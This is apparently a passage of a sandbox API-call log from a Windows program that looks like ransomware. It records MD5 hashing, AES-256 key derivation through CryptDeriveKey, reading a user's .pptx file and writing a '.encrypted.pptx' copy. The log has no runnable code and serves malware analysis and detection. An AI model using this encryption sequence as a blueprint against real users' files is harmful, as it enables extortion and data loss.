0 [0036.220] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.220] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.221] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.221] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.221] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.221] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.221] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.221] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.221] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.221] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.221] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0036.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.221] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0036.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.221] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.221] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.221] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.222] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0036.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.222] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.222] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.222] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.222] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.222] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.222] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0036.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.222] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.222] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0036.222] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.222] CryptDestroyHash (hHash=0x7c2100) returned 1 [0036.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.222] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.222] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.223] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.223] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.223] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\jiof8cjeekxryv.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.223] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.223] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0036.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0036.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0036.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.223] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0036.223] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.223] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0036.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c55e8 [0036.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0036.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0036.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0036.225] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd")) returned 0x10 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0036.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.encrypted.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\jiof8cjeekxryv.encrypted.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0036.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.226] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0036.226] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0036.226] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0036.226] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0036.227] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0036.227] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x7df0, lpOverlapped=0x0) returned 1 [0036.228] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0036.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7df0) returned 0x955018 [0036.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0036.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0036.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7df0) returned 0x95ce10 [0036.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.230] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0036.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7df0) returned 0x955018 [0036.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0036.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.231] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0036.231] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.231] 